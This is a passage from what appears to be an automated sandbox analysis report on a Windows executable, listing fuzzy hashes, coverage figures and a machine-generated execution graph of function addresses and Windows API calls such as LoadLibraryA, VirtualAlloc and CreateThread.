                            • Opcode Fuzzy Hash: 98dab1cb01b021df85c4e2773f3ef182a83cdd50f2952866cd6c392297a248ff
                            • Instruction Fuzzy Hash: FF5103B2619BC481EE50CB65B45036BB7A1F7897E0F944636EEDD47BA9CF2CC0408B00

                            Execution Graph

                            Execution Coverage:10%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0.3%
                            Total number of Nodes:992
                            Total number of Limit Nodes:30
                            execution_graph 4905 7ff65b031449 4908 7ff65b0320d0 4905->4908 4909 7ff65b0320f0 4908->4909 4911 7ff65b031463 4908->4911 4910 7ff65b0387d0 3 API calls 4909->4910 4909->4911 4910->4911 4912 7ff65b0310c9 4913 7ff65b0310f8 15 API calls 4912->4913 4914 7ff65b0310ea 4913->4914 4931 7ff65b034ae9 TlsSetValue 4932 7ff65b034b13 4931->4932 4933 7ff65b0317ec 4934 7ff65b0317fa 4933->4934 4935 7ff65b042265 3 API calls 4934->4935 4937 7ff65b032ebc 4934->4937 4935->4937 4936 7ff65b032f89 4937->4936 4938 7ff65b042265 3 API calls 4937->4938 4938->4936 4986 7ff65b031490 4987 7ff65b0320d0 3 API calls 4986->4987 4988 7ff65b0314ad 4987->4988 4989 7ff65b032c90 4990 7ff65b032cae 4989->4990 4991 7ff65b042265 3 API calls 4990->4991 4992 7ff65b032cb6 4990->4992 4993 7ff65b032e57 4990->4993 4991->4992 4992->4993 4994 7ff65b042265 3 API calls 4992->4994 4994->4993 4939 7ff65b03166e 4940 7ff65b031672 4939->4940 4941 7ff65b0320d0 3 API calls 4940->4941 4942 7ff65b03168b 4941->4942 4915 7ff65b031e4f 4916 7ff65b031e5a 4915->4916 4917 7ff65b031e5f 4915->4917 4918 7ff65b042265 3 API calls 4917->4918 4918->4916 4943 7ff65b034574 4944 7ff65b03457e 4943->4944 4945 7ff65b034626 4944->4945 4946 7ff65b0387d0 3 API calls 4944->4946 4946->4945 4998 7ff65b031017 4999 7ff65b031024 4998->4999 5000 7ff65b031037 __set_app_type 4999->5000 5001 7ff65b031043 4999->5001 5000->5001 3846 7ff65b03109a 3849 7ff65b0310f8 3846->3849 3850 7ff65b03112f 3849->3850 3851 7ff65b0311ad _initterm 3850->3851 3852 7ff65b0311d5 3850->3852 3856 7ff65b0310bb 3850->3856 3851->3852 3853 7ff65b0311ed _initterm 3852->3853 3854 7ff65b031213 3852->3854 3853->3854 3857 7ff65b20d0a0 3854->3857 3862 7ff65b20d0bb 3857->3862 3859 7ff65b20d199 3865 7ff65b20d07d 3859->3865 3860 7ff65b20d0fe _ismbblead 3860->3862 3861 7ff65b20d148 memset 3861->3859 3862->3860 3862->3861 3868 7ff65b20d06a 3865->3868 3871 7ff65b20c6ca 3868->3871 4030 7ff65b0336c9 3871->4030 3875 7ff65b20c6d3 4045 7ff65b0339d1 3875->4045 4050 7ff65b0350e0 3875->4050 4060 7ff65b068010 3875->4060 3890 7ff65b20c680 3890->3871 3891 7ff65b095eb5 3890->3891 3894 7ff65b1564a0 3890->3894 3898 7ff65b09690e 3890->3898 3904 7ff65b09b45c 3890->3904 3907 7ff65b0cb7b0 3890->3907 4015 7ff65b0fa570 3890->4015 4021 7ff65b137ce6 3890->4021 4026 7ff65b18814a 3890->4026 4067 7ff65b0ce290 3890->4067 4073 7ff65b0ce340 3890->4073 4093 7ff65b154ee4 3890->4093 4099 7ff65b207160 3890->4099 4107 7ff65b208cad 3890->4107 4136 7ff65b046572 3891->4136 3896 7ff65b1564a9 3894->3896 3895 7ff65b1565a5 3895->3890 3896->3895 4163 7ff65b156220 3896->4163 3899 7ff65b096917 3898->3899 4209 7ff65b0966d0 3899->4209 3902 7ff65b096967 3902->3890 3903 7ff65b045ac9 3 API calls 3903->3902 4269 7ff65b0472bb 3904->4269 3908 7ff65b0cb7d1 3907->3908 4372 7ff65b095dc0 3908->4372 3911 7ff65b0cbb50 3912 7ff65b045c23 3 API calls 3911->3912 4014 7ff65b0cbc75 3911->4014 3912->4014 3913 7ff65b0cbc8c 3914 7ff65b095dc0 3 API calls 3913->3914 3915 7ff65b0cbd75 3914->3915 3916 7ff65b0cbd93 3915->3916 3918 7ff65b0cbdbc 3915->3918 3917 7ff65b045c23 3 API calls 3916->3917 3917->4014 3919 7ff65b095dc0 3 API calls 3918->3919 3920 7ff65b0cbee0 3919->3920 3921 7ff65b0cbefe 3920->3921 3923 7ff65b0cbf1d 3920->3923 3922 7ff65b045c23 3 API calls 3921->3922 3922->4014 3924 7ff65b095dc0 3 API calls 3923->3924 3925 7ff65b0cc1ab 3923->3925 3923->4014 3924->3923 3926 7ff65b0cc1bb 3925->3926 3928 7ff65b0cc1b6 3925->3928 3927 7ff65b045c23 3 API calls 3926->3927 3927->4014 3929 7ff65b095dc0 3 API calls 3928->3929 3930 7ff65b0cc2f2 3929->3930 3931 7ff65b0cc310 3930->3931 3933 7ff65b0cc357 3930->3933 3932 7ff65b045c23 3 API calls 3931->3932 3932->4014 3934 7ff65b095dc0 3 API calls 3933->3934 3935 7ff65b0cc451 3934->3935 3936 7ff65b0cc46f 3935->3936 3938 7ff65b0cc4b6 3935->3938 3937 7ff65b045c23 3 API calls 3936->3937 3937->4014 3939 7ff65b095dc0 3 API calls 3938->3939 3938->4014 3940 7ff65b0cc693 3939->3940 3941 7ff65b0cc6e3 3940->3941 3943 7ff65b0cc6de 3940->3943 3940->4014 3942 7ff65b045c23 3 API calls 3941->3942 3942->4014 3944 7ff65b095dc0 3 API calls 3943->3944 3945 7ff65b0cc81c 3944->3945 3946 7ff65b0cc83a 3945->3946 3948 7ff65b0cc941 3945->3948 3947 7ff65b045c23 3 API calls 3946->3947 3946->4014 3947->4014 3949 7ff65b095dc0 3 API calls 3948->3949 3950 7ff65b0cca30 3949->3950 3951 7ff65b0cca4e 3950->3951 3953 7ff65b0ccb82 3950->3953 3952 7ff65b045c23 3 API calls 3951->3952 3951->4014 3952->3951 3954 7ff65b095dc0 3 API calls 3953->3954 3955 7ff65b0ccc65 3954->3955 3956 7ff65b0ccc83 3955->3956 3958 7ff65b0cccb4 3955->3958 3957 7ff65b045c23 3 API calls 3956->3957 3957->4014 3959 7ff65b095dc0 3 API calls 3958->3959 3960 7ff65b0ccdb4 3959->3960 3961 7ff65b095dc0 3 API calls 3960->3961 3962 7ff65b0cceb2 3961->3962 3963 7ff65b095dc0 3 API calls 3962->3963 3964 7ff65b0ccfce 3963->3964 3965 7ff65b095dc0 3 API calls 3964->3965 3966 7ff65b0cd0bc 3965->3966 3967 7ff65b095dc0 3 API calls 3966->3967 3968 7ff65b0cd1c6 3967->3968 3969 7ff65b095dc0 3 API calls 3968->3969 3970 7ff65b0cd2e0 3969->3970 3971 7ff65b095dc0 3 API calls 3970->3971 3972 7ff65b0cd40e 3971->3972 3973 7ff65b095dc0 3 API calls 3972->3973 3974 7ff65b0cd51e 3973->3974 3975 7ff65b095dc0 3 API calls 3974->3975 3976 7ff65b0cd63a 3975->3976 3977 7ff65b095dc0 3 API calls 3976->3977 3978 7ff65b0cd744 3977->3978 3979 7ff65b095dc0 3 API calls 3978->3979 3980 7ff65b0cd84e 3979->3980 3981 7ff65b095dc0 3 API calls 3980->3981 3982 7ff65b0cd944 3981->3982 3983 7ff65b095dc0 3 API calls 3982->3983 3984 7ff65b0cda4e 3983->3984 3985 7ff65b095dc0 3 API calls 3984->3985 3986 7ff65b0cdb58 3985->3986 3987 7ff65b095dc0 3 API calls 3986->3987 3988 7ff65b0cdc48 3987->3988 4389 7ff65b069e60 3988->4389 3990 7ff65b0cdc71 3990->4014 4402 7ff65b07dcf0 3990->4402 3992 7ff65b0cdca5 3993 7ff65b045ac9 3 API calls 3992->3993 3992->4014 3994 7ff65b0cdd9d 3993->3994 3995 7ff65b045ac9 3 API calls 3994->3995 3994->4014 3997 7ff65b0cde22 3995->3997 3996 7ff65b045ac9 3 API calls 3996->3997 3997->3996 3998 7ff65b0cdfb2 3997->3998 3997->4014 3999 7ff65b045ac9 3 API calls 3998->3999 3998->4014 4000 7ff65b0cdff9 3999->4000 4001 7ff65b045ac9 3 API calls 4000->4001 4000->4014 4002 7ff65b0ce042 4001->4002 4003 7ff65b045ac9 3 API calls 4002->4003 4002->4014 4004 7ff65b0ce08b 4003->4004 4005 7ff65b045ac9 3 API calls 4004->4005 4004->4014 4006 7ff65b0ce0ce 4005->4006 4007 7ff65b045ac9 3 API calls 4006->4007 4006->4014 4008 7ff65b0ce117 4007->4008 4009 7ff65b045ac9 3 API calls 4008->4009 4008->4014 4010 7ff65b0ce15a 4009->4010 4011 7ff65b045ac9 3 API calls 4010->4011 4010->4014 4012 7ff65b0ce1c1 4011->4012 4013 7ff65b045ac9 3 API calls 4012->4013 4012->4014 4013->4014 4014->3890 4016 7ff65b0fa579 4015->4016 4563 7ff65b080a60 4016->4563 4018 7ff65b0fa588 4020 7ff65b0fa6d5 4018->4020 4573 7ff65b04a280 4018->4573 4020->3890 4639 7ff65b04a7d7 4021->4639 4024 7ff65b04a7d7 3 API calls 4025 7ff65b137d32 4024->4025 4025->3890 4027 7ff65b18815c 4026->4027 4028 7ff65b045ac9 3 API calls 4027->4028 4029 7ff65b188179 4028->4029 4029->3890 4659 7ff65b038980 4030->4659 4032 7ff65b0336ef 4662 7ff65b038a80 4032->4662 4035 7ff65b038a80 3 API calls 4036 7ff65b03375e 4035->4036 4037 7ff65b038a80 3 API calls 4036->4037 4038 7ff65b033778 4037->4038 4039 7ff65b038a80 3 API calls 4038->4039 4040 7ff65b033792 4039->4040 4041 7ff65b038a80 3 API calls 4040->4041 4042 7ff65b0337ac 4041->4042 4043 7ff65b038a80 3 API calls 4042->4043 4044 7ff65b0337c6 4043->4044 4044->3875 4046 7ff65b038980 LoadLibraryA 4045->4046 4047 7ff65b0339f7 4046->4047 4048 7ff65b038a80 3 API calls 4047->4048 4049 7ff65b033a4c 4048->4049 4049->3875 4051 7ff65b035257 4050->4051 4053 7ff65b035154 4050->4053 4052 7ff65b03e95a 3 API calls 4051->4052 4054 7ff65b035293 4051->4054 4052->4054 4055 7ff65b038980 LoadLibraryA 4053->4055 4054->3875 4056 7ff65b0351bf 4055->4056 4056->4051 4057 7ff65b0351e9 4056->4057 4058 7ff65b038a80 3 API calls 4057->4058 4059 7ff65b035247 4058->4059 4059->3875 4061 7ff65b038980 LoadLibraryA 4060->4061 4062 7ff65b068020 4061->4062 4063 7ff65b06804d 4062->4063 4064 7ff65b068036 ExitProcess 4062->4064 4065 7ff65b06815e 4063->4065 4066 7ff65b038a80 3 API calls 4063->4066 4064->4063 4065->3890 4066->4065 4068 7ff65b0ce2a2 4067->4068 4069 7ff65b038980 LoadLibraryA 4068->4069 4070 7ff65b0ce2cf 4069->4070 4071 7ff65b038a80 3 API calls 4070->4071 4072 7ff65b0ce32d 4071->4072 4072->3890 4074 7ff65b0ce352 4073->4074 4075 7ff65b038980 LoadLibraryA 4074->4075 4078 7ff65b0ce37f 4075->4078 4076 7ff65b038a80 3 API calls 4077 7ff65b0ce3dd 4076->4077 4079 7ff65b038a80 3 API calls 4077->4079 4078->4076 4080 7ff65b0ce3ff 4079->4080 4081 7ff65b038a80 3 API calls 4080->4081 4082 7ff65b0ce421 4081->4082 4083 7ff65b038a80 3 API calls 4082->4083 4084 7ff65b0ce443 4083->4084 4085 7ff65b038a80 3 API calls 4084->4085 4086 7ff65b0ce465 4085->4086 4087 7ff65b038a80 3 API calls 4086->4087 4088 7ff65b0ce487 4087->4088 4089 7ff65b038a80 3 API calls 4088->4089 4090 7ff65b0ce4a9 4089->4090 4091 7ff65b038a80 3 API calls 4090->4091 4092 7ff65b0ce4cb 4091->4092 4092->3890 4094 7ff65b154ef6 4093->4094 4095 7ff65b038980 LoadLibraryA 4094->4095 4096 7ff65b154f23 4095->4096 4097 7ff65b038a80 3 API calls 4096->4097 4098 7ff65b154f81 4097->4098 4098->3890 4100 7ff65b2072f1 4099->4100 4101 7ff65b2071cf 4099->4101 4100->3890 4102 7ff65b038980 LoadLibraryA 4101->4102 4103 7ff65b207249 4102->4103 4103->4100 4104 7ff65b038a80 3 API calls 4103->4104 4105 7ff65b2072d1 4104->4105 4106 7ff65b038a80 3 API calls 4105->4106 4106->4100 4108 7ff65b038980 LoadLibraryA 4107->4108 4109 7ff65b208cd3 4108->4109 4110 7ff65b038a80 3 API calls 4109->4110 4111 7ff65b208d28 4110->4111 4112 7ff65b038a80 3 API calls 4111->4112 4113 7ff65b208d42 4112->4113 4114 7ff65b038a80 3 API calls 4113->4114 4115 7ff65b208d5c 4114->4115 4116 7ff65b038a80 3 API calls 4115->4116 4117 7ff65b208d76 4116->4117 4118 7ff65b038a80 3 API calls 4117->4118 4119 7ff65b208d90 4118->4119 4120 7ff65b038a80 3 API calls 4119->4120 4121 7ff65b208daa 4120->4121 4122 7ff65b038a80 3 API calls 4121->4122 4123 7ff65b208dc4 4122->4123 4124 7ff65b038a80 3 API calls 4123->4124 4125 7ff65b208dde 4124->4125 4126 7ff65b038a80 3 API calls 4125->4126 4127 7ff65b208df8 4126->4127 4128 7ff65b038a80 3 API calls 4127->4128 4129 7ff65b208e12 4128->4129 4130 7ff65b038a80 3 API calls 4129->4130 4131 7ff65b208e2c 4130->4131 4132 7ff65b038a80 3 API calls 4131->4132 4133 7ff65b208e46 4132->4133 4134 7ff65b038a80 3 API calls 4133->4134 4135 7ff65b208e60 4134->4135 4135->3890 4139 7ff65b046548 4136->4139 4142 7ff65b045d90 4139->4142 4143 7ff65b045f9d 4142->4143 4147 7ff65b045e08 4142->4147 4152 7ff65b0387d0 4143->4152 4144 7ff65b045fa2 4146 7ff65b045fe1 4157 7ff65b045c23 4146->4157 4147->4144 4147->4146 4150 7ff65b0460cc 4147->4150 4160 7ff65b045c07 4147->4160 4151 7ff65b0387d0 3 API calls 4150->4151 4151->4144 4154 7ff65b03888c 4152->4154 4153 7ff65b045ac9 VirtualAlloc VirtualFree ExitProcess 4153->4154 4154->4153 4155 7ff65b045a1a VirtualAlloc VirtualFree ExitProcess 4154->4155 4156 7ff65b038971 4154->4156 4155->4154 4156->4144 4158 7ff65b045c4f VirtualAlloc VirtualFree ExitProcess 4157->4158 4159 7ff65b045c49 4158->4159 4159->4144 4161 7ff65b095760 VirtualAlloc VirtualFree ExitProcess 4160->4161 4162 7ff65b045c15 4161->4162 4164 7ff65b156298 4163->4164 4165 7ff65b156330 4163->4165 4169 7ff65b154f94 4164->4169 4165->3895 4167 7ff65b1562fd 4167->4165 4172 7ff65b156020 4167->4172 4171 7ff65b154fa6 4169->4171 4170 7ff65b154fe2 GetSystemInfo 4170->4167 4171->4170 4173 7ff65b15602e 4172->4173 4174 7ff65b156049 4173->4174 4177 7ff65b15605d 4173->4177 4175 7ff65b045c23 3 API calls 4174->4175 4176 7ff65b156058 4175->4176 4176->4167 4177->4176 4179 7ff65b034b38 4177->4179 4180 7ff65b034b50 4179->4180 4189 7ff65b034a60 VirtualAlloc 4180->4189 4182 7ff65b034b71 4183 7ff65b034b87 CreateThread 4182->4183 4184 7ff65b034c7f 4182->4184 4183->4184 4185 7ff65b034c04 4183->4185 4184->4176 4191 7ff65b045ac9 4185->4191 4190 7ff65b034a8c 4189->4190 4190->4182 4192 7ff65b0383d0 VirtualAlloc VirtualFree ExitProcess 4191->4192 4193 7ff65b045ae1 4192->4193 4194 7ff65b045b6c 4193->4194 4195 7ff65b045b62 4193->4195 4197 7ff65b045b8b 4194->4197 4198 7ff65b045b7b 4194->4198 4196 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4195->4196 4201 7ff65b034c13 4196->4201 4199 7ff65b045baa 4197->4199 4200 7ff65b045b9a 4197->4200 4202 7ff65b03e95a VirtualAlloc VirtualFree ExitProcess 4198->4202 4204 7ff65b042a70 VirtualAlloc VirtualFree ExitProcess 4199->4204 4203 7ff65b03e95a VirtualAlloc VirtualFree ExitProcess 4200->4203 4205 7ff65b045a1a 4201->4205 4202->4201 4203->4201 4204->4201 4206 7ff65b045a56 4205->4206 4207 7ff65b045a85 4206->4207 4208 7ff65b044ff0 VirtualAlloc VirtualFree ExitProcess 4206->4208 4208->4207 4210 7ff65b0966de 4209->4210 4217 7ff65b096270 4210->4217 4212 7ff65b0966f5 4212->3902 4212->3903 4213 7ff65b0966ed 4213->4212 4215 7ff65b0968df 4213->4215 4224 7ff65b095f00 4213->4224 4215->4212 4238 7ff65b0407fb 4215->4238 4218 7ff65b096289 4217->4218 4219 7ff65b0964d4 4217->4219 4218->4219 4220 7ff65b09639b 4218->4220 4221 7ff65b096396 4218->4221 4219->4213 4220->4219 4223 7ff65b0387d0 3 API calls 4220->4223 4221->4219 4241 7ff65b03c930 4221->4241 4223->4219 4225 7ff65b095f0e 4224->4225 4226 7ff65b096270 3 API calls 4225->4226 4227 7ff65b095f24 4226->4227 4228 7ff65b095f2c 4227->4228 4229 7ff65b095f00 3 API calls 4227->4229 4230 7ff65b096270 3 API calls 4228->4230 4231 7ff65b095f3e 4229->4231 4235 7ff65b095f78 4230->4235 4232 7ff65b095f80 4231->4232 4233 7ff65b0407fb 3 API calls 4231->4233 4232->4213 4233->4228 4234 7ff65b095f00 3 API calls 4234->4235 4235->4232 4235->4234 4236 7ff65b0960e2 4235->4236 4236->4232 4237 7ff65b0407fb 3 API calls 4236->4237 4237->4232 4262 7ff65b0383d0 4238->4262 4240 7ff65b040813 4242 7ff65b03c943 4241->4242 4243 7ff65b03c9c9 4242->4243 4244 7ff65b03c9c4 4242->4244 4245 7ff65b0387d0 3 API calls 4243->4245 4254 7ff65b03caea 4243->4254 4246 7ff65b03cb78 4244->4246 4247 7ff65b03cb73 4244->4247 4245->4254 4248 7ff65b0387d0 3 API calls 4246->4248 4251 7ff65b03ccfa 4247->4251 4252 7ff65b03ccff 4247->4252 4247->4254 4248->4254 4249 7ff65b03ce87 4249->4219 4251->4254 4255 7ff65b0387d0 3 API calls 4251->4255 4253 7ff65b0387d0 3 API calls 4252->4253 4253->4254 4254->4249 4256 7ff65b03cee5 4254->4256 4255->4254 4257 7ff65b03cefb 4256->4257 4258 7ff65b045ac9 VirtualAlloc VirtualFree ExitProcess 4257->4258 4259 7ff65b03cf25 4258->4259 4260 7ff65b045a1a VirtualAlloc VirtualFree ExitProcess 4259->4260 4261 7ff65b03cf9c 4260->4261 4261->4249 4263 7ff65b0383ed 4262->4263 4264 7ff65b03858a 4262->4264 4263->4264 4265 7ff65b038580 4263->4265 4266 7ff65b038585 4263->4266 4264->4240 4265->4264 4268 7ff65b0387d0 3 API calls 4265->4268 4267 7ff65b0387d0 3 API calls 4266->4267 4267->4264 4268->4264 4272 7ff65b0471a0 4269->4272 4273 7ff65b047200 4272->4273 4274 7ff65b0472b2 4272->4274 4277 7ff65b0472ad 4273->4277 4278 7ff65b046600 4273->4278 4288 7ff65b046a80 4273->4288 4277->3890 4279 7ff65b046665 4278->4279 4284 7ff65b046648 4278->4284 4280 7ff65b0387d0 3 API calls 4279->4280 4281 7ff65b04666a 4280->4281 4281->4273 4282 7ff65b0468ef 4283 7ff65b045c23 3 API calls 4282->4283 4283->4281 4284->4281 4284->4282 4286 7ff65b046969 4284->4286 4301 7ff65b0465cf 4284->4301 4287 7ff65b0387d0 3 API calls 4286->4287 4287->4281 4289 7ff65b046aab 4288->4289 4291 7ff65b046ac5 4288->4291 4290 7ff65b046600 3 API calls 4289->4290 4294 7ff65b046ac0 4290->4294 4292 7ff65b046e8b 4291->4292 4293 7ff65b046f75 4291->4293 4291->4294 4297 7ff65b046e20 4291->4297 4292->4294 4304 7ff65b043d80 4292->4304 4295 7ff65b0387d0 3 API calls 4293->4295 4294->4273 4295->4294 4297->4294 4299 7ff65b04716e 4297->4299 4367 7ff65b046a3e 4297->4367 4300 7ff65b0387d0 3 API calls 4299->4300 4300->4294 4302 7ff65b04659c VirtualAlloc VirtualFree ExitProcess 4301->4302 4303 7ff65b0465e0 4302->4303 4303->4284 4305 7ff65b043dba 4304->4305 4306 7ff65b0383d0 VirtualAlloc VirtualFree ExitProcess 4305->4306 4307 7ff65b043de5 4306->4307 4308 7ff65b043ec4 4307->4308 4309 7ff65b043e14 4307->4309 4361 7ff65b043e8d 4307->4361 4310 7ff65b044c80 VirtualAlloc VirtualFree ExitProcess 4308->4310 4311 7ff65b043e9f 4309->4311 4312 7ff65b043e84 4309->4312 4314 7ff65b043f62 4310->4314 4313 7ff65b0427f0 VirtualAlloc VirtualFree ExitProcess 4311->4313 4315 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4312->4315 4313->4361 4316 7ff65b043fe6 4314->4316 4317 7ff65b043fcb 4314->4317 4315->4361 4319 7ff65b044047 4316->4319 4320 7ff65b044472 4316->4320 4318 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4317->4318 4318->4361 4322 7ff65b044068 4319->4322 4323 7ff65b04406d 4319->4323 4321 7ff65b04449b 4320->4321 4325 7ff65b044496 4320->4325 4326 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4321->4326 4327 7ff65b04416d 4322->4327 4328 7ff65b044185 4322->4328 4324 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4323->4324 4324->4361 4329 7ff65b044683 4325->4329 4330 7ff65b044513 4325->4330 4326->4361 4331 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4327->4331 4332 7ff65b044279 4328->4332 4333 7ff65b0441a9 4328->4333 4338 7ff65b0446a7 4329->4338 4339 7ff65b0446ac 4329->4339 4336 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4330->4336 4330->4361 4331->4361 4334 7ff65b044287 4332->4334 4335 7ff65b0442a5 4332->4335 4340 7ff65b03e95a VirtualAlloc VirtualFree ExitProcess 4333->4340 4333->4361 4341 7ff65b03e95a VirtualAlloc VirtualFree ExitProcess 4334->4341 4337 7ff65b042a70 VirtualAlloc VirtualFree ExitProcess 4335->4337 4336->4330 4342 7ff65b0442b6 4337->4342 4344 7ff65b044857 4338->4344 4345 7ff65b044744 4338->4345 4343 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4339->4343 4340->4361 4341->4361 4348 7ff65b044300 4342->4348 4358 7ff65b0442fb 4342->4358 4343->4361 4346 7ff65b044970 4344->4346 4347 7ff65b044865 4344->4347 4351 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4345->4351 4349 7ff65b04499c 4346->4349 4350 7ff65b04497e 4346->4350 4352 7ff65b03e95a VirtualAlloc VirtualFree ExitProcess 4347->4352 4347->4361 4354 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4348->4354 4355 7ff65b044adb 4349->4355 4356 7ff65b0449aa 4349->4356 4353 7ff65b03e95a VirtualAlloc VirtualFree ExitProcess 4350->4353 4351->4361 4352->4347 4353->4361 4354->4361 4357 7ff65b043930 VirtualAlloc VirtualFree ExitProcess 4355->4357 4362 7ff65b044abe 4355->4362 4359 7ff65b03e95a VirtualAlloc VirtualFree ExitProcess 4356->4359 4356->4362 4357->4362 4360 7ff65b03e95a VirtualAlloc VirtualFree ExitProcess 4358->4360 4358->4361 4359->4362 4360->4361 4361->4297 4362->4361 4363 7ff65b044db9 4362->4363 4364 7ff65b044eb8 4362->4364 4363->4361 4365 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4363->4365 4364->4361 4366 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4364->4366 4365->4361 4366->4361 4368 7ff65b045632 VirtualAlloc VirtualFree ExitProcess 4367->4368 4369 7ff65b046a55 4368->4369 4370 7ff65b046a5d 4369->4370 4371 7ff65b042265 VirtualAlloc VirtualFree ExitProcess 4369->4371 4370->4297 4371->4370 4421 7ff65b095940 4372->4421 4375 7ff65b095df5 4377 7ff65b095940 3 API calls 4375->4377 4378 7ff65b095e26 4377->4378 4379 7ff65b095e2e 4378->4379 4380 7ff65b042265 3 API calls 4378->4380 4381 7ff65b095940 3 API calls 4379->4381 4380->4379 4382 7ff65b095e5f 4381->4382 4383 7ff65b095e67 4382->4383 4384 7ff65b042265 3 API calls 4382->4384 4385 7ff65b095940 3 API calls 4383->4385 4384->4383 4386 7ff65b095e98 4385->4386 4387 7ff65b095ea0 4386->4387 4388 7ff65b042265 3 API calls 4386->4388 4387->3911 4387->3913 4388->4387 4390 7ff65b069edb 4389->4390 4397 7ff65b069fad 4389->4397 4453 7ff65b0684c0 4390->4453 4391 7ff65b0684c0 3 API calls 4393 7ff65b06a1c2 4391->4393 4395 7ff65b0684c0 3 API calls 4396 7ff65b069f7c 4395->4396 4396->4397 4398 7ff65b045ac9 3 API calls 4396->4398 4397->4391 4400 7ff65b06a0f3 4397->4400 4399 7ff65b069fc5 4398->4399 4457 7ff65b0691b6 4399->4457 4400->3990 4400->4400 4403 7ff65b07dcfe 4402->4403 4479 7ff65b07d5c1 4403->4479 4406 7ff65b045ac9 3 API calls 4407 7ff65b07dd1b 4406->4407 4486 7ff65b07d770 4407->4486 4410 7ff65b07dde5 4415 7ff65b07de8d 4410->4415 4498 7ff65b07d5fb 4410->4498 4412 7ff65b07debe 4413 7ff65b07df0b 4412->4413 4414 7ff65b07def3 4412->4414 4502 7ff65b0c8dca 4413->4502 4416 7ff65b045c23 3 API calls 4414->4416 4415->3992 4418 7ff65b07df06 4416->4418 4418->3992 4420 7ff65b045c23 3 API calls 4420->4418 4422 7ff65b09594e 4421->4422 4423 7ff65b095abb 4422->4423 4424 7ff65b095ab1 4422->4424 4426 7ff65b095ab6 4422->4426 4423->4375 4428 7ff65b042265 4423->4428 4432 7ff65b041de0 4424->4432 4427 7ff65b0387d0 3 API calls 4426->4427 4427->4423 4429 7ff65b042273 4428->4429 4430 7ff65b0407fb 3 API calls 4429->4430 4431 7ff65b0422d3 4429->4431 4430->4431 4431->4375 4433 7ff65b041df7 4432->4433 4434 7ff65b041e12 4433->4434 4436 7ff65b041e17 4433->4436 4435 7ff65b041f32 4434->4435 4439 7ff65b041ad0 4434->4439 4435->4423 4436->4435 4438 7ff65b03c930 3 API calls 4436->4438 4438->4435 4440 7ff65b041ae3 4439->4440 4441 7ff65b041b3f 4440->4441 4442 7ff65b041b35 4440->4442 4444 7ff65b041c38 4441->4444 4445 7ff65b041cd5 4441->4445 4447 7ff65b03d010 VirtualAlloc VirtualFree ExitProcess 4441->4447 4443 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4442->4443 4449 7ff65b041b3a 4443->4449 4448 7ff65b0403a0 VirtualAlloc VirtualFree ExitProcess 4444->4448 4446 7ff65b0387d0 VirtualAlloc VirtualFree ExitProcess 4445->4446 4445->4449 4446->4445 4447->4444 4450 7ff65b041c72 4448->4450 4449->4435 4450->4445 4451 7ff65b041cd0 4450->4451 4451->4449 4452 7ff65b0416b0 VirtualAlloc VirtualFree ExitProcess 4451->4452 4452->4449 4454 7ff65b068573 4453->4454 4455 7ff65b068608 4454->4455 4456 7ff65b0387d0 3 API calls 4454->4456 4455->4395 4456->4454 4458 7ff65b06925d 4457->4458 4459 7ff65b0691d2 4457->4459 4458->4397 4459->4458 4461 7ff65b0475c0 4459->4461 4462 7ff65b0476ca 4461->4462 4463 7ff65b0476d4 4461->4463 4466 7ff65b0387d0 3 API calls 4462->4466 4464 7ff65b04773f 4463->4464 4465 7ff65b047735 4463->4465 4468 7ff65b04775e 4464->4468 4469 7ff65b04774e 4464->4469 4467 7ff65b0387d0 3 API calls 4465->4467 4474 7ff65b0476cf 4466->4474 4467->4474 4471 7ff65b0477f7 4468->4471 4473 7ff65b047801 4468->4473 4476 7ff65b03e95a 4469->4476 4472 7ff65b0387d0 3 API calls 4471->4472 4472->4474 4473->4474 4475 7ff65b03e95a 3 API calls 4473->4475 4474->4458 4475->4474 4477 7ff65b03cee5 VirtualAlloc VirtualFree ExitProcess 4476->4477 4478 7ff65b03e980 4477->4478 4478->4474 4507 7ff65b07d4c1 4479->4507 4482 7ff65b07d5d7 4482->4406 4485 7ff65b0407fb 3 API calls 4485->4482 4487 7ff65b07d788 4486->4487 4488 7ff65b07d7bc 4487->4488 4489 7ff65b07d7f9 4487->4489 4490 7ff65b03e95a 3 API calls 4488->4490 4519 7ff65b07dbf3 4489->4519 4492 7ff65b07d7f4 4490->4492 4492->4410 4492->4412 4492->4415 4493 7ff65b07d803 4493->4492 4494 7ff65b07d848 4493->4494 4495 7ff65b07d885 4493->4495 4496 7ff65b03e95a 3 API calls 4494->4496 4495->4492 4526 7ff65b049580 4495->4526 4496->4492 4499 7ff65b07d615 4498->4499 4500 7ff65b07d666 4499->4500 4501 7ff65b07d290 3 API calls 4499->4501 4500->4410 4501->4500 4559 7ff65b0c8e30 4502->4559 4505 7ff65b07df58 4505->4418 4505->4420 4506 7ff65b0407fb 3 API calls 4506->4505 4508 7ff65b07d4da 4507->4508 4509 7ff65b07d566 4507->4509 4508->4509 4510 7ff65b0387d0 3 API calls 4508->4510 4509->4482 4511 7ff65b07d59c 4509->4511 4510->4509 4514 7ff65b07d290 4511->4514 4513 7ff65b07d5bb 4513->4485 4517 7ff65b07d2a9 4514->4517 4515 7ff65b07d4c1 VirtualAlloc VirtualFree ExitProcess 4515->4517 4516 7ff65b07d375 4516->4513 4517->4515 4517->4516 4518 7ff65b0407fb VirtualAlloc VirtualFree ExitProcess 4517->4518 4518->4517 4520 7ff65b07dc09 4519->4520 4521 7ff65b07dc59 4520->4521 4524 7ff65b07dc54 4520->4524 4522 7ff65b0387d0 3 API calls 4521->4522 4523 7ff65b07dc62 4522->4523 4523->4493 4524->4523 4525 7ff65b0387d0 3 API calls 4524->4525 4525->4523 4527 7ff65b04966e 4526->4527 4529 7ff65b0495fd 4526->4529 4531 7ff65b049669 4529->4531 4532 7ff65b048880 4529->4532 4542 7ff65b048c30 4529->4542 4531->4495 4533 7ff65b04899f 4532->4533 4538 